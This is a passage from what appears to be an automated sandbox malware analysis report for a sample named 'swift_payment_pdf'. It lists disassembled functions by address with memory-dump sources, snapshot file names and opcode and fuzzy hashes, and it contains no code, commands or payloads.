                  • Instruction Fuzzy Hash: 54E0C233100590ABC712FB5DDD11F4A73AEEFA5774F014121F954872A8CA64AC40C798
                  Function 01388A90 Relevance: .0, Instructions: 20COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                  • Instruction ID: b1e3f48d75f4a3f4f7a2fd130c90c258e94e9f306f3838c0b18ec5ba752bafa9
                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                  • Instruction Fuzzy Hash: CFE04F33121B1887D728EE18D511A62B7A9EB45720B09462AA61347780C534E544C794
                  Function 013A6AA4 Relevance: .0, Instructions: 17COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                  • Instruction ID: 8e154679c7d0cc6a75219f0ab22c36fd2a2791661861b573ee0d3b25a14796df
                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                  • Instruction Fuzzy Hash: 93D05E76511A50AFD7329F1FEA04C13BBF9FBC4B10709062EA54583924C670A806CBA0
                  Function 0138E59C Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                  • Instruction ID: 24b6c7d0fd7d54e43f41be81eb601977b65e4280a0b264be161bd2799914c79d
                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                  • Instruction Fuzzy Hash: 7AD0A932204620ABDB32AA1CFC00FC333E9BB88B28F060459B008C7054C3A0AC81CB84
                  Function 013CE908 Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                  • Instruction ID: d0fb033dd0ecef58c59e88516fba06dfe7b8867e48115edc934c4137a5ba73d8
                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                  • Instruction Fuzzy Hash: 22E0EC359506849BDF52DF5DC640F9ABBB9BB94F44F150068A5085B664C628AD00CB40
                  Function 0134A0E3 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                  • Instruction ID: 31ff7206389a943e3ea252079dd7571ec9af46e9321effa503eca8436a1235a0
                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                  • Instruction Fuzzy Hash: E1D0223221703093CF285A5A6800F637949AB80A98F0A002CB40B93C04C0048C42D2E0
                  Function 0138A830 Relevance: .0, Instructions: 14COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                  • Instruction ID: be73d7bfa83681e058e72375e29ede053bd33206d1c1bb2c2f2d5dd0d2899a53
                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                  • Instruction Fuzzy Hash: BAD012371D054DBBCB119F66DC01F957BA9E764BA0F448020B508875A0C67AE950D584
                  Function 0138CA24 Relevance: .0, Instructions: 14COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c6f0074b0e4abe07f377344b0f1f4c579b6c476baef67e8f1ff214a43c4a4c8
                  • Instruction ID: b17d7a85ff444a4bf3b56180c3da44676ebc42e009183c1cf088d654f7ace789
                  • Opcode Fuzzy Hash: 4c6f0074b0e4abe07f377344b0f1f4c579b6c476baef67e8f1ff214a43c4a4c8
                  • Instruction Fuzzy Hash: 78D0C734555605DBEF16DF59C511D6EB674FB54B48B4010ACFF0561524D32ADD01C750
                  Function 013602A0 Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction ID: 6d0375a96d14577e55aa311401aea41b990765c10590e6a1f096928c127d85d2
                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction Fuzzy Hash: 1ED09235212A80CFD61A8B0CC5A5B1533A8BB44A48F814490E542CBB26E668D940CA00
                  Function 0138C700 Relevance: .0, Instructions: 12COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                  • Instruction ID: 63444585ffa9fb8d15f271d997c54e42201435a136177d1482af1f817eba76ca
                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                  • Instruction Fuzzy Hash: 52C01232290648AFCB12AA99CD01F027BA9EBA8B40F004021F2088B670C671E820EA84
                  Function 01370310 Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                  • Instruction ID: 1a4b3260873ec6d715ab0c520e045cceeaf64850d8f3dcc7f05300e935beb4fa
                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                  • Instruction Fuzzy Hash: 08D01236100248EFCB15DF55C890D9AB72AFBD8710F148019FD19077108A35ED62DA50
                  Function 01350750 Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                  • Instruction ID: 447ae259f13416392d7df797501389cb387c11c0901f091d6026b0332ebc7943
                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                  • Instruction Fuzzy Hash: B2C04C757015418FCF15DB1DD294F4577E4F754744F154890E905CB721E624E801CA10
                  Function 01394340 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4907ea2b066eddc35caf169c99f90060e268c0f583ba502b4ce7efe9c89e7625
                  • Instruction ID: 02810798db1066d1a1cf479d2dcdb29bac42859c5e202a1b277dd87258fa775c
                  • Opcode Fuzzy Hash: 4907ea2b066eddc35caf169c99f90060e268c0f583ba502b4ce7efe9c89e7625
                  • Instruction Fuzzy Hash: 1D900275B0580012E140719C48985464005E7E0306B95C051E0424554CCA148A5A5361
                  Function 01394650 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b78569b427e00e989d4d0b7132ab0a2ea73456cc022c874b278c8261eaccd3f5
                  • Instruction ID: f44f1666d09ef209627cb51b45c3077bdf6e4f7a77cd08948c652b575e2bab91
                  • Opcode Fuzzy Hash: b78569b427e00e989d4d0b7132ab0a2ea73456cc022c874b278c8261eaccd3f5
                  • Instruction Fuzzy Hash: 4D9002A5B01500429140719C48184066005E7E13063D5C155A0554560CC61889599369
                  Function 01392BA0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dfabac3c2777eba355ece43c4672d82c406d8f883ea07039fe624d2997ff7160
                  • Instruction ID: a01454a4b9550121b05302f274716429318a62f2b36b0f2dee0379c907cb5d55
                  • Opcode Fuzzy Hash: dfabac3c2777eba355ece43c4672d82c406d8f883ea07039fe624d2997ff7160
                  • Instruction Fuzzy Hash: B7900275B0540802E150719C44287460005D7D0306F95C051A0024654DC7558B5977A1
                  Function 01392B80 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d2afcc7f9c93bcaded4a32d29b6c0d1e7bb9411e5aacdc1f75d22e15dd1fa1e
                  • Instruction ID: ff15e7c94fd0d1c9c4c715d8e51275da1f980ca398b0ab18d09adf4c5c800d4c
                  • Opcode Fuzzy Hash: 2d2afcc7f9c93bcaded4a32d29b6c0d1e7bb9411e5aacdc1f75d22e15dd1fa1e
                  • Instruction Fuzzy Hash: 7B90027570140802E104719C48186860005D7D0306F95C051A6024655ED66589957231
                  Function 01392BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21fcc72d660052474c047d10c3f7bf0e7688994f20cc22e6d19cc11a3912d778
                  • Instruction ID: 27d948913df111ddc88081c8087eca3b9d044d39cde21c6310df0d3b0612c8c6
                  • Opcode Fuzzy Hash: 21fcc72d660052474c047d10c3f7bf0e7688994f20cc22e6d19cc11a3912d778
                  • Instruction Fuzzy Hash: 7F90027570140802E180719C441864A0005D7D1306FD5C055A0025654DCA158B5D77A1
                  Function 01392BE0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e16ca3558e5ad3385901e2264d8390e91567ba6a282d2fc26ba085ff13b30da
                  • Instruction ID: c88ba02455efaf4b2139030a8b50ebcea9713ea1d8e9820181b1bc05411dfb19
                  • Opcode Fuzzy Hash: 6e16ca3558e5ad3385901e2264d8390e91567ba6a282d2fc26ba085ff13b30da
                  • Instruction Fuzzy Hash: 7990027570544842E140719C4418A460015D7D030AF95C051A0064694DD6258E59B761
                  Function 01392AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                  • Instruction ID: e17992ca8a3c34bd884217003387bd5a6867b64d8d493f044df11efcf919e36c
                  • Opcode Fuzzy Hash: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                  • Instruction Fuzzy Hash: EE9002E5701540929500B29C8418B0A4505D7E0206B95C056E1054560CC52589559235
                  Function 01392AF0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                  • Instruction ID: e4b55b88863f7ab3ef9ebc2d431e087dc74b36d8b6732df40a074d97b40c3c88
                  • Opcode Fuzzy Hash: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                  • Instruction Fuzzy Hash: 17900269721400025145B59C061850B0445E7D63563D5C055F1416590CC62189695321
                  Function 01392AD0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                  • Instruction ID: 889fd49eca3b873cb439e22732a3ec5e64950351c93b5a7749d4c28f1c6127d1
                  • Opcode Fuzzy Hash: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                  • Instruction Fuzzy Hash: 5F90047D711400035105F5DC071C5070047D7D53573D5C071F1015550CD731CD755331
                  Function 01392D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                  • Instruction ID: 3bcfe5c298e04485f57fd5ecde75e51cde4a8b84cdb82f4c5f74a4f49e9ab351
                  • Opcode Fuzzy Hash: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                  • Instruction Fuzzy Hash: A090026570140003E140719C542C6064005E7E1306F95D051E0414554CD915895A5322
                  Function 01392D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                  • Instruction ID: 4d517a52e65ce09ca2a1e8d9bbb5c995ee2d312e1a65bc90702dcdb31015d797
                  • Opcode Fuzzy Hash: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                  • Instruction Fuzzy Hash: CD90026D71340002E180719C541C60A0005D7D1207FD5D455A0015558CC915896D5321
                  Function 01392D00 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                  • Instruction ID: 00d7bb50e0bd29b74387d006eaf27d2fe7647a25101e707d24da5d22013036fd
                  • Opcode Fuzzy Hash: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                  • Instruction Fuzzy Hash: B590026570544442E100759C541CA060005D7D020AF95D051A1064595DC6358955A231
                  Function 01392DB0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                  • Instruction ID: eca994b8e3190509e15cbba2affc40dfe564de9d33bcd716c41d94797e047145
                  • Opcode Fuzzy Hash: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                  • Instruction Fuzzy Hash: 0090027574140402E141719C44186060009E7D0246FD5C052A0424554EC6558B5AAB61
                  Function 01392DD0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                  • Instruction ID: f6654d845c9738dc4ad5e6bda0590f3f0fce7891c9edc979525a14c3e5297c6f
                  • Opcode Fuzzy Hash: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                  • Instruction Fuzzy Hash: F090026574244152A545B19C44185074006E7E02467D5C052A1414950CC526995AD721
                  Function 01392C60 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 594dca6a877b9a46ac1b0e469c01a99514fbab8dc75313f66a3398e6819ca7a0
                  • Instruction ID: 616768e27635898e81510b7f571fd4d0ed22c3f7b587c1fcfe24b7e35a691f54
                  • Opcode Fuzzy Hash: 594dca6a877b9a46ac1b0e469c01a99514fbab8dc75313f66a3398e6819ca7a0
                  • Instruction Fuzzy Hash: F890027570140842E100719C4418B460005D7E0306F95C056A0124654DC615C9557621
                  Function 01392CA0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53d3b96935caa6574bbfe771102a10d45ad94f0b10890ab78c3d860a5c772a83
                  • Instruction ID: acf212e65f20ca05c946b0713bd22930c0a88c629d68c4061e180417cff59a71
                  • Opcode Fuzzy Hash: 53d3b96935caa6574bbfe771102a10d45ad94f0b10890ab78c3d860a5c772a83
                  • Instruction Fuzzy Hash: BC90027570140402E10075DC541C6460005D7E0306F95D051A5024555EC66589956231
                  Function 01392CF0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4ea31dbc528102e9cf90bbecabf6f0e1ed2146159d199ac249340f369ff9147
                  • Instruction ID: cf219d520f013b4bb78c3b9a9dd0a853f6fb87adea325321c60fa3a6ca50cf2b
                  • Opcode Fuzzy Hash: d4ea31dbc528102e9cf90bbecabf6f0e1ed2146159d199ac249340f369ff9147
                  • Instruction Fuzzy Hash: 8390027570140403E100719C551C7070005D7D0206F95D451A0424558DD65689556221
                  Function 01392CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 46c3e480ef7dbdd59c9db585167485d337de5e321c0f8f74929e6868723f0864
                  • Instruction ID: 4e796b16f680c4d13ed60bafb4e1a60129a622bd2b80040dbcba8380e371ece0
                  • Opcode Fuzzy Hash: 46c3e480ef7dbdd59c9db585167485d337de5e321c0f8f74929e6868723f0864
                  • Instruction Fuzzy Hash: 17900265B0540402E140719C542C7060015D7D0206F95D051A0024554DC6598B5967A1
                  Function 01392F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34789080342c4a5340f9325a96b4197649e1ee687f8afab9fa3715af5737c24f
                  • Instruction ID: 9f27e88d4af6192a74adfd8a6b230bf1c90fe0d71b80f4aa9926eadb1ce2c54e
                  • Opcode Fuzzy Hash: 34789080342c4a5340f9325a96b4197649e1ee687f8afab9fa3715af5737c24f
                  • Instruction Fuzzy Hash: 129002A574140442E100719C4428B060005D7E1306F95C055E1064554DC619CD566226
                  Function 01392F60 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6bda260aa1990cb2acacc364c6b0be86a7c319d0222deb5ef06f42cb1858cb17
                  • Instruction ID: 31a412f669db0d85fd197990ad8d2120bacf46cd6fcd4fc0e80a1895c390c6e1
                  • Opcode Fuzzy Hash: 6bda260aa1990cb2acacc364c6b0be86a7c319d0222deb5ef06f42cb1858cb17
                  • Instruction Fuzzy Hash: 499002A571140042E104719C44187060045D7E1206F95C052A2154554CC5298D655225
                  Function 01392FB0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c7cbc78b7c9fb604ea70d48f7dba22aeea0d0ab243682907687c906677484756
                  • Instruction ID: 54d2ee8676f41c466ed1cea6bd126d83541e49cf764e5283b90eb6f83b6e5469
                  • Opcode Fuzzy Hash: c7cbc78b7c9fb604ea70d48f7dba22aeea0d0ab243682907687c906677484756
                  • Instruction Fuzzy Hash: 9E900265B0140042914071AC88589064005FBE1216795C161A0998550DC55989695765
                  Function 01392FA0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 535227446b3fc16a83bc4b238d3aa20611b3bfe00acdf7d720253d457c24ff14
                  • Instruction ID: 3d174c0e60e1733cb188fb9f5cb3bfe6619e0448dd18369027692d9649af464f
                  • Opcode Fuzzy Hash: 535227446b3fc16a83bc4b238d3aa20611b3bfe00acdf7d720253d457c24ff14
                  • Instruction Fuzzy Hash: BB90027570180402E100719C481C7470005D7D0307F95C051A5164555EC665C9956631
                  Function 01392F90 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 117b0691897969359246c8e9d7961dc34223b045d3f38c841a61b4ec875fde15
                  • Instruction ID: e31db196d671ee527d71b97b8d553466959cd3cf3867f86f9f3a765c9b3251cb
                  • Opcode Fuzzy Hash: 117b0691897969359246c8e9d7961dc34223b045d3f38c841a61b4ec875fde15
                  • Instruction Fuzzy Hash: 3C90027570180402E100719C482870B0005D7D0307F95C051A1164555DC62589556671
                  Function 01392FE0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
